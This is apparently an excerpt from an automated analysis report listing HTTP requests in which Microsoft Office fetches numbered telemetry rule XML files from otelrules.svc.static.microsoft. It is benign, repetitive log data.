                Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
                Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
